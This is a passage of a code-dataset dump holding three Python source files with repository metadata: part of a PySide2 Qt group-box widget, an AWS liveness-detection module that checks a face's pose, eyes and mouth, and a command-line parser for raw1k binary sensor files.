font.setBold(False)\n self.button_add_employee.setFont(font)\n self.button_add_employee.setObjectName('button_add_employee')\n self.horizontal_layout.addWidget(self.button_add_employee)\n self.vertical_layout.addLayout(self.horizontal_layout)\n\n self.setTitle(self.title)\n self.label.setText(f'{self.my_strings.label_total}:')\n self.button_add_employee.setIcon(QtGui.QIcon(url_plus))\n self.button_add_employee.setIconSize(QtCore.QSize(12, 12))\n\n def connect_signals(self, controller):\n self.button_add_employee.clicked.connect(controller.clicked_add_employee)\n\n self.table.connect_signals(function_double_click=controller.clicked_add_employee,\n function_delete=controller.delete_employee)\n", "repo_name": "AlberLC/complete-qt-app", "sub_path": "my_qt/group_boxes.py", "file_name": "group_boxes.py", "file_ext": "py", 
"file_size_in_byte": 10218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PySide2.QtWidgets.QGroupBox", "line_number": 10, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 10, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 16, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 16, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 21, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 21, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 28, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 28, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 32, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 32, "usage_type": "name"}, {"api_name": "my_qt.table_widgets.BatteryNeedTable", "line_number": 91, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.BOSNeedTable", "line_number": 100, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.InverterNeedTable", "line_number": 109, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.PanelNeedTable", "line_number": 118, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.StructureNeedTable", "line_number": 127, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.BatteryQuotationTable", "line_number": 139, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.BOSQuotationTable", "line_number": 148, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.InverterQuotationTable", "line_number": 157, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.PanelQuotationTable", "line_number": 166, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.StructureQuotationTable", "line_number": 175, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.RelatedPanelQuotationTable", "line_number": 187, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.StaffTable", "line_number": 211, "usage_type": "argument"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 214, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 214, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 221, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 221, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 225, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 225, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 227, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 227, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 228, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 228, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 233, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 236, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 236, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 237, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 237, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 238, "usage_type": "call"}, {"api_name": "PySide2.QtCore", 
"line_number": 238, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 239, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 239, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 250, "usage_type": "call"}, {"api_name": "resources.url_plus", "line_number": 250, "usage_type": "argument"}, {"api_name": "PySide2.QtGui", "line_number": 250, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 251, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 251, "usage_type": "name"}]} +{"seq_id": "6099401739", "text": "import logging\nimport secrets\n\nfrom .framework import challenge_params, challenge_state\nfrom .framework import CHALLENGE_SUCCESS, CHALLENGE_FAIL\n\n_log = logging.getLogger('liveness-backend')\n\nPOSE_EYS = ['OPEN', 'CLOSED', 'LOOKING_LEFT', 'LOOKING_RIGHT']\nPOSE_MOUTH = ['CLOSED', 'SMILE']\n\nREKOGNITION_FACE_MIN_CONFIDENCE = 90\nREKOGNITION_FACE_MAX_ROTATION = 20\nEYE_DIRECTION_AREA_MULTIPLIER = 1.2 # the bigger the value, more permissive\n\n\n@challenge_params(challenge_type='POSE')\ndef pose_challenge_params(client_metadata):\n image_width = int(client_metadata['imageWidth'])\n image_height = int(client_metadata['imageHeight'])\n params = dict()\n params['imageWidth'] = image_width\n params['imageHeight'] = image_height\n params['pose'] = {\n 'eyes': secrets.choice(POSE_EYS),\n 'mouth': secrets.choice(POSE_MOUTH)\n }\n return params\n\n\n@challenge_state(challenge_type='POSE', first=True)\ndef first_state(params, frame, _context):\n _log.debug(f'Params: {params}')\n _log.debug(f'Frame: {frame}')\n\n faces = frame['rekMetadata']\n num_faces = len(faces)\n _log.debug(f'Number of faces: {num_faces}')\n if num_faces != 1:\n _log.info(f'FAIL: Number of faces. Expected: 1 Actual: {num_faces}')\n return CHALLENGE_FAIL\n\n face = faces[0]\n confidence = face['Confidence']\n _log.debug(f'Confidence: {confidence}')\n if face['Confidence'] < REKOGNITION_FACE_MIN_CONFIDENCE:\n _log.info(f'FAIL: Confidence. Expected: {REKOGNITION_FACE_MIN_CONFIDENCE} Actual: {confidence}')\n return CHALLENGE_FAIL\n\n rotation_pose = face['Pose']\n _log.debug(f'Rotation: {rotation_pose}')\n if _is_rotated(rotation_pose):\n _log.info(f'FAIL: Face rotation. Expected: {REKOGNITION_FACE_MAX_ROTATION} Actual: {rotation_pose}')\n return CHALLENGE_FAIL\n\n expected_eyes = params['pose']['eyes']\n if not _are_eyes_correct(expected_eyes, face):\n _log.info(f'FAIL: Eyes. Expected: {expected_eyes}')\n return CHALLENGE_FAIL\n\n expected_mouth = params['pose']['mouth']\n if not _is_mouth_correct(expected_mouth, face):\n _log.info(f'FAIL: Mouth. 
Expected: {expected_mouth}')\n return CHALLENGE_FAIL\n\n _log.info(f'Success!')\n return CHALLENGE_SUCCESS\n\n\ndef _is_rotated(pose):\n return (abs(pose['Roll']) > REKOGNITION_FACE_MAX_ROTATION or\n abs(pose['Yaw']) > REKOGNITION_FACE_MAX_ROTATION or\n abs(pose['Pitch']) > REKOGNITION_FACE_MAX_ROTATION)\n\n\ndef _is_mouth_correct(expected, face):\n should_smile = expected == 'SMILE'\n is_smiling = face['Smile']['Value']\n is_mouth_open = face['MouthOpen']['Value']\n _log.debug(f'Smiling: {is_smiling} Mouth open: {is_mouth_open}')\n return (should_smile and is_smiling and is_mouth_open) or (\n not should_smile and not is_smiling and not is_mouth_open)\n\n\ndef _are_eyes_correct(expected, face):\n are_open = face['EyesOpen']['Value']\n _log.debug(f'Eyes open: {are_open}')\n if (expected == 'CLOSED' and are_open) or (expected != 'CLOSED' and not are_open):\n return False\n\n eye_left, eye_right = _get_eyes_coordinates(face['Landmarks'])\n _log.debug(f'Eyes coordinates - Left: {eye_left} Right: {eye_right}')\n eye_left_direction = _get_eye_direction(eye_left)\n _log.debug(f'Left eye direction: {eye_left_direction}')\n if _is_eye_opposite_direction(eye_left_direction, expected):\n _log.debug(f'Wrong left eye direction. Expected: {expected} Actual: {eye_left_direction}')\n return False\n eye_right_direction = _get_eye_direction(eye_right)\n _log.debug(f'Right eye direction: {eye_right_direction}')\n if _is_eye_opposite_direction(eye_right_direction, expected):\n _log.debug(f'Wrong right eye direction. Expected: {expected} Actual: {eye_right_direction}')\n return False\n return True\n\n\ndef _get_eyes_coordinates(landmarks):\n eye_left = {}\n eye_right = {}\n for landmark in landmarks:\n if landmark['Type'] == 'rightEyeLeft':\n eye_right['left'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'rightEyeRight':\n eye_right['right'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'rightPupil':\n eye_right['pupil'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'leftEyeLeft':\n eye_left['left'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'leftEyeRight':\n eye_left['right'] = {'x': landmark['X'], 'y': landmark['Y']}\n elif landmark['Type'] == 'leftPupil':\n eye_left['pupil'] = {'x': landmark['X'], 'y': landmark['Y']}\n return eye_left, eye_right\n\n\ndef _get_eye_direction(eye):\n one_third_of_eye_width = (eye['right']['x'] - eye['left']['x']) / 3\n if eye['pupil']['x'] <= eye['left']['x'] + one_third_of_eye_width * EYE_DIRECTION_AREA_MULTIPLIER:\n return 'LOOKING_LEFT'\n elif eye['pupil']['x'] >= eye['right']['x'] - one_third_of_eye_width * EYE_DIRECTION_AREA_MULTIPLIER:\n return 'LOOKING_RIGHT'\n return 'OPEN'\n\n\ndef _is_eye_opposite_direction(direction, expected):\n return (direction == 'LOOKING_LEFT' and expected == 'LOOKING_RIGHT') or (\n direction == 'LOOKING_RIGHT' and expected == 'LOOKING_LEFT')\n", "repo_name": "aws-solutions/liveness-detection-framework", "sub_path": "source/backend/chalicelib/pose.py", "file_name": "pose.py", "file_ext": "py", "file_size_in_byte": 5306, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 42, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "secrets.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "secrets.choice", "line_number": 26, "usage_type": "call"}, {"api_name": "framework.challenge_params", "line_number": 17, "usage_type": "call"}, 
{"api_name": "framework.CHALLENGE_FAIL", "line_number": 41, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_FAIL", "line_number": 48, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_FAIL", "line_number": 54, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_FAIL", "line_number": 59, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_FAIL", "line_number": 64, "usage_type": "name"}, {"api_name": "framework.CHALLENGE_SUCCESS", "line_number": 67, "usage_type": "name"}, {"api_name": "framework.challenge_state", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "12884897091", "text": "#! /usr/bin/env python3\n\"\"\"\nScript to parse raw1k files and output data\n\"\"\"\nimport argparse\nimport datetime\nimport gzip\nimport io\nimport itertools\nimport json\nimport logging\nimport multiprocessing\nimport shutil\nimport struct\nimport sys\n\nimport progress_bar\nimport pytz\n\nLOG = logging.getLogger()\nLOG_HANDLE = logging.StreamHandler()\nLOG_FORMAT = logging.Formatter(\n \"%(asctime)s %(name)-8s %(levelname)-8s \"\n \"%(message)s\", \"%Y-%m-%d %H:%M:%S\")\nLOG_HANDLE.setFormatter(LOG_FORMAT)\nLOG.addHandler(LOG_HANDLE)\nDEFAULT_TAGS = \"tags.json\"\nSIDE_LOOKUP = {\"keep\": -1, \"left\": 1, \"right\": 0, \"both\": 2}\nDEFAULT_SIDE_OPTION = \"keep\"\nDEFAULT_SIDE_VALUE = SIDE_LOOKUP[DEFAULT_SIDE_OPTION]\nTIME_METAVAR = \"HH:MM:SS\"\nUNSUPPORTED = \"UNSUPPORTED\"\n\n\ndef main():\n \"\"\" Main function for raw1k parsing \"\"\"\n args = argument_parsing()\n set_log_level(args.verbosity)\n tags = import_json_tags(args.tags)\n\n if args.filter:\n tags = filter_tags(tags, args)\n\n if args.subcommand == \"modify\":\n LOG.info(\"Duplicating %s\", args.input)\n shutil.copyfile(args.input, args.output)\n LOG.info(\"Finding and changing timestamps\")\n modify_raw1k_file(args.input,\n args.output,\n tags,\n date=args.date,\n time=args.time,\n start_time=args.start,\n end_time=args.end,\n side=args.side)\n LOG.info(\"Timestamps changed. 
Modified file saved as %s\", args.output)\n elif args.subcommand == \"raw\":\n LOG.info(\"Parsing %s\", args.input)\n parsed_raw_file = parse_raw1k_file(args.input, tags)\n export_raw_pressure_data(parsed_raw_file, args.output)\n elif args.subcommand == \"dump\":\n LOG.info(\"Parsing %s\", args.input)\n parsed_raw_file = parse_raw1k_file(args.input, tags, bool(args.filter), raw=args.raw)\n export_raw1k_json_file(parsed_raw_file, args.output)\n sys.exit(0)\n\n\n####################\n# ARGUMENT PARSING #\n####################\n\n\ndef argument_parsing():\n \"\"\" Parse the command line arguments \"\"\"\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n subparsers = parser.add_subparsers(dest=\"subcommand\")\n # sub parser for json output\n dump_description = \"Dump raw1k to JSON\"\n dump_parser = subparsers.add_parser(\n \"dump\",\n description=dump_description,\n help=dump_description,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n dump_parser.add_argument(\"-i\",\n \"--input\",\n required=True,\n help=\"input raw1k file\")\n dump_parser.add_argument(\"-o\",\n \"--output\",\n required=True,\n help=\"output json file\")\n dump_parser.add_argument(\"-t\",\n \"--tags\",\n default=DEFAULT_TAGS,\n help=\"tags json file used for parsing\")\n dump_parser.add_argument(\"--raw\",\n action=\"store_true\",\n default=False,\n help=\"Add raw pressure values to json file\")\n dump_parser.add_argument(\"-v\", \"--verbosity\", action=\"count\", default=0)\n\n dump_parser.add_argument(\"-f\",\n \"--filter\",\n nargs='*',\n help=\"Filter output tags\")\n\n # sub parser for raw pressure output\n raw_description = \"Dump raw pressure values to a single file\"\n raw_parser = subparsers.add_parser(\n \"raw\",\n description=raw_description,\n help=raw_description,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n raw_parser.add_argument(\"-i\",\n \"--input\",\n required=True,\n help=\"input raw1k file\")\n raw_parser.add_argument(\"-o\",\n \"--output\",\n required=True,\n help=\"output raw pressure file\")\n raw_parser.add_argument(\"--tags\",\n default=DEFAULT_TAGS,\n help=\"tags json file used for parsing\")\n raw_parser.add_argument(\"-v\", \"--verbosity\", action=\"count\", default=0)\n\n # sub parser for raw1k output\n raw1k_description = \"Modify aspects of a raw1k file\"\n modify_parser = subparsers.add_parser(\n \"modify\",\n description=raw1k_description,\n help=raw1k_description,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n conflict_handler=\"resolve\")\n modify_parser.add_argument(\"-i\",\n \"--input\",\n required=True,\n help=\"input raw1k file\")\n modify_parser.add_argument(\"-o\",\n \"--output\",\n required=True,\n help=\"output raw pressure file\")\n modify_parser.add_argument(\"-t\",\n \"--tags\",\n default=DEFAULT_TAGS,\n help=\"tags json file used for parsing\")\n modify_parser.add_argument(\"--side\",\n choices=SIDE_LOOKUP,\n default=DEFAULT_SIDE_OPTION,\n help=\"Set the sleeper to a specific side\")\n modify_parser.add_argument(\"-v\", \"--verbosity\", action=\"count\", default=0)\n time = modify_parser.add_argument_group(\"Time Modification\")\n time.add_argument(\"-d\",\n \"--date\",\n type=validate_date,\n required=False,\n metavar=\"YYYY-MM-DD\",\n help=\"desired date\")\n time.add_argument(\"-t\",\n \"--time\",\n type=validate_time,\n required=False,\n metavar=TIME_METAVAR,\n help=\"change timestamp start time\")\n\n truncate = modify_parser.add_argument_group(\"Truncate\")\n 
truncate.add_argument(\"-s\",\n \"--start\",\n type=validate_time,\n metavar=TIME_METAVAR,\n help=\"Specify start time of truncated sample\")\n truncate.add_argument(\"-e\",\n \"--end\",\n type=validate_time,\n metavar=TIME_METAVAR,\n help=\"Specify end time of truncated sample\")\n # Parse the arguments\n args = parser.parse_args()\n return args\n\n\ndef validate_date(in_string):\n \"\"\" Validate the entered date from the command line \"\"\"\n try:\n return datetime.datetime.strptime(in_string, \"%Y-%m-%d\").date()\n except ValueError:\n raise argparse.ArgumentTypeError(\n 'Date must be entered as \"YYYY-MM-DD\"')\n\n\ndef validate_time(in_string):\n \"\"\" Validate the entered time from the command line \"\"\"\n try:\n return datetime.datetime.strptime(in_string, \"%H:%M:%S\").time()\n except ValueError:\n raise argparse.ArgumentTypeError(\n 'Time must be entered as \"{}\"'.format(TIME_METAVAR))\n\n\ndef set_log_level(verbosity):\n \"\"\" Set the log level of the application \"\"\"\n if verbosity == 0:\n LOG.setLevel(logging.WARNING)\n elif verbosity == 1:\n LOG.setLevel(logging.INFO)\n else:\n LOG.setLevel(logging.DEBUG)\n return\n\n\n###########################\n# RAW1K PARSING FUNCTIONS #\n###########################\n\n\ndef import_json_timezones(input_file_path):\n \"\"\" Import timezones as a json file into a dictionary for parsing \"\"\"\n with open(input_file_path) as tags_json:\n return json.load(tags_json)\n\n\ndef import_json_tags(input_file_path):\n \"\"\" Import tags as a json file into a dictionary for parsing \"\"\"\n with open(input_file_path) as tags_json:\n return json.load(tags_json)\n\n\ndef parse_raw1k_file(input_file_path, tags, filter_input=False, raw=True, show_bar=True):\n \"\"\" Read in the raw1k file and parse it into a dictionary\"\"\"\n packet_parsers = create_packet_parser_lookup(tags)\n tag_lookup_dict = create_tag_lookup_dict(tags)\n packets_to_parse = {}\n with open(input_file_path, \"rb\") as raw1k:\n if show_bar:\n file_read_bar = progress_bar.InitBarForInfile(input_file_path)\n # Get and parse header\n file_header = parse_file_header(file=raw1k,\n tags=tags,\n packet_parsers=packet_parsers,\n filter_input=filter_input)\n packets = {\"header\": file_header}\n # Get rest of packets\n for packet_id, packet in enumerate(packets_in_file(raw1k)):\n packet[\"data\"] = read_raw_bytes(raw1k, packet[\"packet_size\"])\n raw_data_size = read_short(raw1k) # Length of compressed data\n packet[\"compressed_data\"] = read_raw_bytes(raw1k, raw_data_size)\n packets_to_parse[packet_id] = packet\n if show_bar:\n file_read_bar(raw1k.tell())\n if show_bar:\n del file_read_bar\n with multiprocessing.Pool(processes=multiprocessing.cpu_count()) as pool:\n if show_bar:\n bar_size = len(packets_to_parse)\n parse_bar = progress_bar.InitBar(title=\"Parsing\", size=bar_size)\n parse_packet_tasks = {}\n # Set up multi processing tasks for parsing each packet\n for packet_id, packet in packets_to_parse.items():\n parse_packet_tasks[packet_id] = pool.apply_async(\n parse_packet, (\n packet,\n tags,\n packet_parsers,\n tag_lookup_dict,\n raw,\n filter_input,\n ))\n # Get the parsed tags for each packet\n for packet_id, parsed_packet in parse_packet_tasks.items():\n packets[packet_id] = parsed_packet.get()\n if show_bar:\n parse_bar(packet_id)\n return packets\n\n\ndef parse_packet(packet, tags, packet_parsers, tag_lookup_dict, raw, filter_input):\n \"\"\" Parse tags in a packet\"\"\"\n with io.BytesIO(packet[\"data\"]) as packet_data:\n repeat_tags = {}\n parsed_tags = {\n 
\"time_stamp\": packet[\"time_stamp\"],\n \"packet_size\": packet[\"packet_size\"]\n }\n for tag_id in packet_tag_ids(packet_data, tags):\n tag_name = tag_lookup_dict.get(tag_id, UNSUPPORTED)\n if filter_input and tag_name == UNSUPPORTED:\n continue\n packet_parser = packet_parsers.get(tag_id, default_parser)\n if tag_name in parsed_tags:\n repeat_tags[tag_id] = repeat_tags.get(tag_id, 0) + 1\n tag_name = \"{}-{}\".format(tag_name, repeat_tags[tag_id])\n parsed_tag = parse_tag(packet_data, tag_id, packet_parser)\n parsed_tags[tag_name] = parsed_tag\n # Parse Raw Data/compressed section\n raw_tags = parse_compressed_data(packet[\"compressed_data\"], tags,\n packet_parsers, raw)\n for tag_name, tag_data in raw_tags.items():\n if filter_input and tag_name == UNSUPPORTED:\n continue\n parsed_tags[tag_name] = tag_data\n return parsed_tags\n\n\nBYTES_IN_PACKET_HEADER = 10\nSIZE_BYTES = 2\nSENSOR_SERIAL_NUMBER_TAG = 331\nTIME_ZONE_TAG = 202\nTIME_TAGS = {350, 351} # DSP and RAWDATA timestamps\n\n\ndef modify_raw1k_file(input_file_path, output_file_path, tags, **kwargs):\n \"\"\" Change time stamp in raw1k file \"\"\"\n show_bar = LOG.getEffectiveLevel() < logging.WARNING\n with open(input_file_path, \"rb\") as raw1k, open(output_file_path,\n \"r+b\") as output_file:\n if show_bar:\n current_progress_bar = progress_bar.InitBarForInfile(\n input_file_path)\n # Truncate Arguments\n start_time = kwargs.pop(\"start_time\")\n end_time = kwargs.pop(\"end_time\")\n truncate = bool(start_time and end_time) and start_time != end_time\n # Time modification arguments\n date = kwargs.pop(\"date\")\n time = kwargs.pop(\"time\")\n modify_time = bool(date or time)\n time_offset = 0\n # Header modifications\n timezone = get_time_zone(raw1k, tags)\n modify_file_header(raw1k, output_file, tags, **kwargs)\n end_of_header = raw1k.tell()\n for packet_header in packets_in_file(raw1k):\n if modify_time:\n if not time_offset:\n time_offset = get_time_stamp_offset(\n packet_header[\"time_stamp\"], date, time, timezone)\n location = raw1k.tell() - BYTES_IN_PACKET_HEADER\n update_timestamp(output_file, location, time_offset)\n # Find beginning of time slice\n if truncate and is_matching_packet(\n start_time, packet_header[\"time_stamp\"], timezone):\n LOG.debug(\"Found start of time slice offset: %d\", raw1k.tell())\n start_offset = raw1k.tell() - BYTES_IN_PACKET_HEADER\n # Parse all tags in packet\n for tag_id in packet_tag_ids(raw1k, tags):\n # Update the timestamps\n if modify_time and tag_id in TIME_TAGS:\n location = raw1k.tell() + SIZE_BYTES\n update_timestamp(output_file, location, time_offset)\n parse_tag(raw1k, tag_id, default_parser)\n # Skip reading the raw data section\n raw_data_size = read_short(raw1k)\n skip_bytes(raw1k, raw_data_size)\n # Find end of time slice\n if truncate and is_matching_packet(\n end_time, packet_header[\"time_stamp\"], timezone):\n LOG.debug(\"Found end of time slice offset: %d\", raw1k.tell())\n end_offset = raw1k.tell()\n raw1k.seek(0, 2) # Seek to the end of the file\n break\n if show_bar:\n current_progress_bar(raw1k.tell())\n if show_bar:\n current_progress_bar(raw1k.tell()) # Update progress one last time\n del current_progress_bar\n if truncate:\n truncate_raw1k(end_of_header, start_offset, end_offset,\n output_file_path)\n\n\nBYTES_IN_FILE_HEADER = 34\n\n\ndef get_time_zone(input_file, tags):\n \"\"\" Get the timezone from the header \"\"\"\n skip_bytes(input_file, BYTES_IN_FILE_HEADER)\n for tag_id in packet_tag_ids(input_file, tags):\n if tag_id == TIME_ZONE_TAG:\n parsed_tag 
= parse_tag(input_file, tag_id, time_zone, packed=True)\n timezone = parsed_tag[\"m_time_zone\"]\n input_file.seek(0)\n return timezone\n parse_tag(input_file, tag_id, default_parser, packed=True)\n raise TypeError(\"File does not contain time zone information\")\n\n\ndef modify_file_header(input_file, output_file, tags, **kwargs):\n \"\"\" Parse raw1k file header \"\"\"\n side = kwargs.pop(\"side\")\n edit_side = side in SIDE_LOOKUP and side != DEFAULT_SIDE_OPTION\n side = SIDE_LOOKUP.get(side, DEFAULT_SIDE_VALUE)\n skip_bytes(input_file, BYTES_IN_FILE_HEADER) # Skip file header values\n for tag_id in packet_tag_ids(input_file, tags):\n if edit_side and tag_id == SENSOR_SERIAL_NUMBER_TAG:\n location = input_file.tell() + SIZE_BYTES\n update_side(output_file, location, side)\n parse_tag(input_file, tag_id, default_parser, packed=True)\n\n\ndef packet_tag_ids(file, tags):\n \"\"\" Generator for packet ids to allow for use in a for loop\"\"\"\n while True:\n tag_id = read_short(file)\n if tag_id == get_tag_id(\"TAG_END_OF_LIST\", tags, tag_not_found=0):\n break\n yield tag_id\n\n\ndef packets_in_file(file):\n \"\"\" Generator for packet ids to allow for use in a for loop\"\"\"\n while True:\n try:\n time_stamp = read_long(file)\n packet_size = read_short(file)\n packet_header = {\n 'time_stamp': time_stamp,\n 'packet_size': packet_size\n }\n yield packet_header\n except struct.error:\n # Got to the end of the file\n break\n\n\ndef create_tag_lookup_dict(tags):\n \"\"\" Create a dict of tags keyed on tag_id with values being the string \"\"\"\n tag_lookup = {}\n for tag in tags:\n if tag not in tag_lookup:\n tag_lookup[tags[tag]['tag']] = tag\n return tag_lookup\n\n\ndef parse_tag(file, tag_id, packet_parser, packed=False):\n \"\"\"\n Parses a given tag_id from a file. 
Returns a dict with parsed information\n \"\"\"\n byte_length = read_short(file)\n word_length = (byte_length + 3) >> 2\n byte_padding_length = (word_length * 4 - byte_length)\n # Get the correct packet parser\n to_return = packet_parser(file=file, tag=tag_id, byte_length=byte_length)\n if byte_padding_length and not packed:\n skip_bytes(file, byte_padding_length)\n return to_return\n\n\ndef parse_compressed_data(compressed, tags, packet_parsers, raw):\n \"\"\" Parse the compressed data at the end of the data packet\"\"\"\n tag_lookup_dict = create_tag_lookup_dict(tags)\n decompressed = gzip.decompress(compressed)\n parsed_tags = {}\n with io.BytesIO(decompressed) as uncompressed:\n for tag_id in packet_tag_ids(uncompressed, tags):\n tag_name = tag_lookup_dict.get(tag_id, UNSUPPORTED)\n packet_parser = packet_parsers.get(tag_id, default_parser)\n if not raw and tag_name == \"TAG_A2D_CH_DATA_32\":\n parse_tag(uncompressed, tag_id, default_parser,\n packed=True) # Skip reading in the raw data\n else:\n parsed_tags[tag_name] = parse_tag(uncompressed,\n tag_id,\n packet_parser,\n packed=True)\n return parsed_tags\n\n\ndef export_raw1k_json_file(raw1k_dict, output_file_path):\n \"\"\" Export a JSON file of the parsed raw file\"\"\"\n LOG.info(\"Dumping json data to %s\", output_file_path)\n write_bar = progress_bar.InitBar(title=output_file_path,\n size=len(raw1k_dict))\n with open(output_file_path, \"w+\") as raw1k_json:\n raw1k_json.write(\"{\\n\")\n for packet_id, parsed_packet in enumerate(raw1k_dict.items()):\n packet, data = parsed_packet\n if packet_id < len(raw1k_dict) - 1: # Correct for 0 based indexing\n raw1k_json.write(\" \\\"{}\\\": {},\\n\".format(\n packet, json.dumps(data)))\n else: # omit comma for last packet\n raw1k_json.write(\" \\\"{}\\\": {}\\n\".format(\n packet, json.dumps(data)))\n write_bar(packet_id)\n raw1k_json.write(\"}\\n\")\n LOG.info(\"JSON data dumped to %s\", output_file_path)\n\n\ndef export_raw_pressure_data(raw1k_dict, output_file_path):\n \"\"\" Export a binary file with only raw pressure data \"\"\"\n LOG.info(\"Exporting raw pressure data to %s\", output_file_path)\n with open(output_file_path, \"wb+\") as raw_pressure:\n for entry in raw1k_dict:\n if 'TAG_A2D_CH_DATA_32' not in raw1k_dict[entry].keys():\n continue\n samples = raw1k_dict[entry]['TAG_A2D_CH_DATA_32']['m_samples']\n for sample in samples:\n raw_pressure.write(struct.pack('i', sample))\n LOG.info(\"Raw pressure data exported to %s\", output_file_path)\n\n\ndef get_time_stamp_offset(time_stamp, set_date, set_time, timezone):\n \"\"\" Calculate the offset between the original raw1k timestamp and the\n desired timestamp.\n \"\"\"\n base_datetime = datetime.datetime.fromtimestamp(time_stamp / 1000)\n base_date = base_datetime.date()\n base_time = base_datetime.time()\n if set_date is None:\n set_date = base_date\n if set_time is None:\n set_time = base_time\n set_datetime = datetime.datetime.combine(set_date, set_time)\n set_datetime = pytz.timezone(timezone).localize(set_datetime)\n set_time_stamp = datetime.datetime.timestamp(set_datetime) * 1000\n LOG.debug(\"Timestamp derived from given date and time is %d\",\n set_time_stamp)\n LOG.debug(\"Raw1k timestamp starts at %d\", time_stamp)\n offset = set_time_stamp - time_stamp\n LOG.debug(\"Timestamp offset is %d\", offset)\n return offset\n\n\ndef is_matching_packet(goal_time, time_stamp, timezone):\n \"\"\" Determine if the current packet is the starting packet of the desired\n sample.\n \"\"\"\n base_datetime =
datetime.datetime.fromtimestamp(time_stamp / 1000)\n base_datetime = pytz.timezone(timezone).localize(base_datetime)\n goal_datetime = datetime.datetime.combine(base_datetime.date(), goal_time)\n goal_datetime = pytz.timezone(timezone).localize(goal_datetime)\n return base_datetime == goal_datetime\n\n\n##################\n# FILE UTILITIES #\n##################\n\n\ndef read_short(file):\n \"\"\" Read 2 bytes and then unpack and return as a short\"\"\"\n return struct.unpack(\"h\", file.read(2))[0]\n\n\ndef read_int(file):\n \"\"\" Read 4 bytes, unpack, return as an integer\"\"\"\n return struct.unpack(\"i\", file.read(4))[0]\n\n\ndef read_byte(file):\n \"\"\" Read in 1 byte\"\"\"\n return int.from_bytes(file.read(1), byteorder='little')\n\n\ndef read_long(file):\n \"\"\" Read 8 bytes, unpack, return as a long long \"\"\"\n return struct.unpack(\"q\", file.read(8))[0]\n\n\ndef read_boolean(file):\n \"\"\" Read 1 byte, unpack and return as a boolean \"\"\"\n return struct.unpack(\"?\", file.read(1))[0]\n\n\ndef read_string(file, length):\n \"\"\" Read a string of characters from binary file, return string\"\"\"\n return file.read(length).decode('utf-8')\n\n\ndef read_raw_bytes(file, length):\n \"\"\" Read raw bytes and return them \"\"\"\n return file.read(length)\n\n\ndef skip_bytes(file, bytes_to_skip=1):\n \"\"\" Skip bytes in file \"\"\"\n file.seek(file.tell() + bytes_to_skip)\n\n\ndef write_int(file, value):\n \"\"\" Write an integer to a file \"\"\"\n to_write = struct.pack(\"i\", int(value))\n file.write(to_write)\n\n\ndef write_long(file, value):\n \"\"\" Write a long to a file \"\"\"\n to_write = struct.pack(\"q\", int(value))\n file.write(to_write)\n\n\n###############\n# TAG PARSERS #\n###############\n\n\ndef create_packet_parser_lookup(tags):\n \"\"\" Match a tag to the appropriate packet parser. 
